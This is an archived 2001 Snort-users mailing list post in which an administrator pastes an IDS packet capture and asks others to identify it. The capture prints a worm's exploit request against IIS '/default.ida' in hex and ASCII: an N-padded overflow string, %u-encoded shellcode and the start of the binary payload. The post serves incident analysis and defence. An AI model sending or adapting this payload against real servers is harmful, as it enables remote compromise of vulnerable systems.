Snort mailing list archives
help with packet trace
From: "Robert L. Yelvington" <robert () sciresearch com>
Date: Thu, 19 Jul 2001 17:04:49 -0700
I searched whitehats.com and rolled snake eyes...can someone provide some insight into this...I'd be glad to discuss this off the list if needed: 07/19-16:25:05.718583 foreign_IP:2633 -> myserver_IP:80 TCP TTL:255 TOS:0x0 ID:0 IpLen:20 DgmLen:1116 ***AP*** Seq: 0x0 Ack: 0x0 Win: 0x0 TcpLen: 20 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F 4E T /default.ida?N 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 25 NNNNNNNNNNNNNNN% 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 u9090%u6858%ucbd 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36 3%u7801%u9090%u6 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801% 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 u9090%u6858%ucbd 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 3%u7801%u9090%u9 30 39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 090%u8190%u00c3% 75 30 30 30 33 25 75 38 62 30 30 25 75 35 33 31 u0003%u8b00%u531 62 25 75 35 33 66 66 25 75 30 30 37 38 25 75 30 b%u53ff%u0078%u0 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 50 2F 000%u00=a HTTP/ 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 1.0..Content-typ 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F 53 54 e: text/xml.HOST 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20 41 :www.worm.com. A 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74 65 ccept: */*.Conte 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 39 20 nt-length: 3569 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 56 57 ....U........SVW 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC CC CC ................ F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A 0B 00 ....p........... thanks a bunch! ~rob _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- help with packet trace Robert L. Yelvington (Jul 19)
- Re: help with packet trace Ryan Russell (Jul 19)
- RE: help with packet trace Neal Timm (Jul 19)